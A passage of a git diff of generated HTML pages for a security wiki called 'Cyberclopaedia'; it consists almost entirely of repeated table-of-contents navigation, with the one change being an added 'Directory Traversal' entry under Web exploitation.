      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -232,22 +232,6 @@

Client-Side H - - diff --git a/docs/Exploitation/Web/HTTP Response Splitting.html b/docs/Exploitation/Web/HTTP Response Splitting.html index 47de5451..b0d0dfc4 100644 --- a/docs/Exploitation/Web/HTTP Response Splitting.html +++ b/docs/Exploitation/Web/HTTP Response Splitting.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -184,22 +184,6 @@

Introduction - - diff --git a/docs/Exploitation/Web/Host Header Injection.html b/docs/Exploitation/Web/Host Header Injection.html index c815c6e0..4ee7cf70 100644 --- a/docs/Exploitation/Web/Host Header Injection.html +++ b/docs/Exploitation/Web/Host Header Injection.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
